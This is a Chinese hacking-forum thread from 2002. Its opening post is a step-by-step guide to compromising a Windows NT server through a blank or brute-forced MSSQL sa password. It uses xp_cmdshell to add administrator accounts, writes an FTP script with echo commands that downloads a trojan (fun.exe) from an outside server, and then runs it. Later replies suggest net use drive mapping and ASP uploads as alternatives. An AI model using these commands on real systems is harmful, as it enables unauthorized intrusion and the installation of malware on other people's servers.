>> 欢迎您, 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助 首页

  小榕软件实验室
  刀光雪影
  mssql系统管理扩展存储的大漏洞
发表文章 发表涂鸦
  回复数:9  点击数:336 将此页发给您的朋友        
作者 主题: mssql系统管理扩展存储的大漏洞 回复 | 收藏 | 打印 | 篇末
7ntmake帅哥哦
级别:新手上路
威望:0
经验:0
货币:
体力:
来源:61.177.118.*
总发帖数:2
注册日期:2002-04-25
查看 邮件 主页 QQ 消息 引用 复制 下载 

mssql系统管理扩展存储的大漏洞

常碰到的情况:一台nt的服务器,只开了80和1433端口,sa的密码为空,但禁止了远程储存,即你不能执行net user *** /add等命令,就算没有禁止你添加了一个admin组的用户,但它完全禁止了共享,拿到这种机器,君欲何为?


如果你和某台nt的服务器有深仇大恨,而它又没什么漏洞可钻的话,暴破我推荐破mssql的sa密码,如果它开了mssql服务的话,比其它暴破又快又准.在mssql中管理员的帐号sa是不可删除,改名或停用的,不象nt的administrator.

一朝你拿到了sa的密码(比如常见的sa的密码为空),你便可以有两件事可做:
1)用mssql的客户端工具(sql分析查询器)连接它的数据库看看里面有没有什么好东东,这里略过不提.
2)添加一个nt管理员的帐号,以便上传下载文件,进一步控制这台机,我们主要说说这后一种情况.

我们知道,mssql默认安装是能够调用大量的系统管理扩展存储,象xp_cmdshell,,Xp_regdeletekey,Xp_regenumvalues 等等.其中最重要的xp_cmdshell,调用它几乎可以完成所有nt的系统命令,比如:"
net user 7nt /add" "net localgroup administrators 7nt /add" 等等,这样就在admin组增加了一个管理员7nt.但是你也会常碰到这种情况,nt上的mssql已经对管理扩展存储作了限制,下面看一个实例:

已知一台机64.49.*.* 只开了80和1433端口,sa的密码为空,禁止了所有共享:
用mssql的客户端连接成功,现在:"dir c:\" ,可以浏览目录. "net user",显示:"Administrator IUSR_TPEWEB01 IWAM_TPEWEB01 Guest"看来还可以读出他的帐号.
再来:"net user administrator" 显示:"System error 1312 has occurred.
A specified logon session does not exist. It may already have been terminated."
同样你运行比如:"net user 7nt /add"等命令,都会得到这个结果,怎么办?

换个其它命令试试:"echo aaa>c:\a.txt" 看看创建一个文本文件a.txt,内容为aaa行不行?显示:"Can'nt Execute Command, Press Any Key to Exit..."哇,好象也不行,连接也断开了.再次和它连上吧,再看看:"dir c:\" ,哇塞,c盘上多了一个a.txt文件,"type c:\a.txt",a.txt文件的内容正是aaa.好了,一切都ok了.

这可是mssql系统管理扩展存储的大漏洞,好比一个小偷正在行窃被警察叔叔当场抓住,送到监牢自不代说,却不问小偷把偷到的财宝交出来,于是小偷可以反复地去偷...哈哈.

剩下的我不多说了,推荐用ftp -s.假设你有一台ftp服务器211.100.8.141,用户名和密码都是7nt,在上面有一个木马fun.exe,你可以反复连接mssql,一次次把这些写进去:"echo open 211.100.8.141>a.txt" "echo 7nt>>a.txt" "echo 7nt>>a.txt" "echo bin>>a.txt" "echo get fun.exe>>a.txt" "echo bye>>a.txt" 要六次呀,有点辛苦?第七次就搞定了:"ftp -s:a.txt" 看看,我们的fun.exe已经传上去了,你可以在mssql的shell里直接运行fun.exe,如果可能最好用at命令.

whh7nt.126.com 7nt 于 2002-4-25


编辑 删除 发表时间发表于 2002-04-25.15:47:06   MSIE 6.0 Windows XPIP: 已记录
哑吧帅哥哦
级别:老 站 友
威望:0
经验:0
货币:1777
体力:100
来源:61.136.221.*
总发帖数:406
注册日期:2002-02-12
查看 邮件 主页 QQ 消息 引用 复制 下载 

我碰到的这台主机可是连dir c:\这个命令都不能用,如何办呢!!!!

编辑 删除 发表时间发表于 2002-04-25.15:53:59   MSIE 5.5 Windows 2000IP: 已记录
神仙姐姐美女哟
级别:风云使者
威望:0
经验:9
货币:3051
体力:32
来源:紫禁城
总发帖数:1081
注册日期:2002-01-28
查看 邮件 主页 QQ 消息 引用 复制 下载 

在哪里抄来的啊?
这么长
----------------------------------------------------------
淡泊明志,宁静至远;请别害我,我是好人!

编辑 删除 发表时间发表于 2002-04-25.16:03:34   MSIE 5.0 Windows 98IP: 已记录
小李飞刀帅哥哦
级别:老 站 友
威望:0
经验:0
货币:745
体力:61.2
来源:山西
总发帖数:294
注册日期:2002-01-28
查看 邮件 主页 QQ 消息 引用 复制 下载 

思路挺好的,该学学呀

编辑 删除 发表时间发表于 2002-04-25.16:49:07   MSIE 5.0 Windows 98IP: 已记录
傲气雄鹰帅哥哦
级别:本论坛版主
威望:0
经验:18
货币:3335
体力:100
来源:云南昆明
总发帖数:1559
注册日期:2002-01-21
查看 邮件 主页 QQ 消息 引用 复制 下载 

转贴还是原创请写明!
----------------------------------------------------------
本论坛不欢迎如下类型的帖子,此类帖子会被关闭或删除,本人恕不回复。
一,刀光雪影完全无关
二,无内容或内容过于简单,标题无意义的
三,个人联系的帖子。和标题为“某某请进”之类的
四,要求代破密码的
五,同一帖子多次重复的,灌水的
六,政治敏感话题,语言不文明,攻击他人的
七,溯雪手册中已有详细介绍或前面帖子中已有大量回复的

编辑 删除 发表时间发表于 2002-04-25.16:52:34   MSIE 5.01 Windows 2000IP: 已记录
libertine帅哥哦
级别:开国大老
威望:0
经验:0
货币:1715
体力:57.6
来源:192.168.0.1
总发帖数:2365
注册日期:2002-02-12
查看 邮件 主页 QQ 消息 引用 复制 下载 

加精
----------------------------------------------------------
http://www.adhacker.net/

编辑 删除 发表时间发表于 2002-04-25.18:35:35   MSIE 6.0 Windows XPIP: 已记录
乱舞心魔帅哥哦
级别:一般站友
威望:0
经验:0
货币:166
体力:32.5
来源:北京
总发帖数:21
注册日期:2002-01-22
查看 邮件 主页 QQ 消息 引用 复制 下载 

为什么不用tftp呢?

编辑 删除 发表时间发表于 2002-04-25.19:28:48   MSIE 5.01 Windows 2000IP: 已记录
lcx帅哥哦
级别:高级站友
威望:0
经验:0
货币:461
体力:19.2
来源:218.58.5.*
总发帖数:172
注册日期:2002-03-06
查看 邮件 主页 QQ 消息 引用 复制 下载 

第一是ftp麻烦.不如直接用映射上传.sqlshell下net use x: \\本机ip\盘名
第二是上传的exe文件在有的机器上的sqlshell下根本无法运行.说是不能运行在dos模式下.这种情况我见到最多只有上传asp了.
----------------------------------------------------------
http://haiyangtop.126.com

编辑 删除 发表时间发表于 2002-04-25.21:09:58   MSIE 5.0 Windows 98IP: 已记录
蓝色王中王帅哥哦
级别:中级站友
威望:0
经验:0
货币:223
体力:34.1
来源:61.167.237.*
总发帖数:41
注册日期:2002-04-19
查看 邮件 主页 QQ 消息 引用 复制 下载 

T
----------------------------------------------------------

编辑 删除 发表时间发表于 2002-04-28.19:55:21   MSIE 5.0 Windows 98IP: 已记录
靓仔帅哥哦
级别:开国大老
威望:1
经验:0
货币:8465
体力:100
来源:127.0.0.1
总发帖数:2556
注册日期:2002-04-24
查看 邮件 主页 QQ 消息 引用 复制 下载 

同意libertine 的看法
转贴还是原创并不重要
----------------------------------------------------------

编辑 删除 发表时间发表于 2002-04-28.22:09:29   MSIE 5.0 Windows 98IP: 已记录
选择回复        
 快速回复主题: >>>高级模式
  用户名: 没有注册? 密码: 忘记密码?
记住密码
HTML语法
禁止IDB代码
禁止表情字符

[按 Ctrl+Enter 快捷键可直接提交帖子]
 投票评分: 共 0 票  
所有时间均为: 北京时间 ↑TOP 
关闭主题 拉前主题 移动主题 主题置顶 取消置顶 总固顶主题 取消总固顶 加入精华 移出精华 删除主题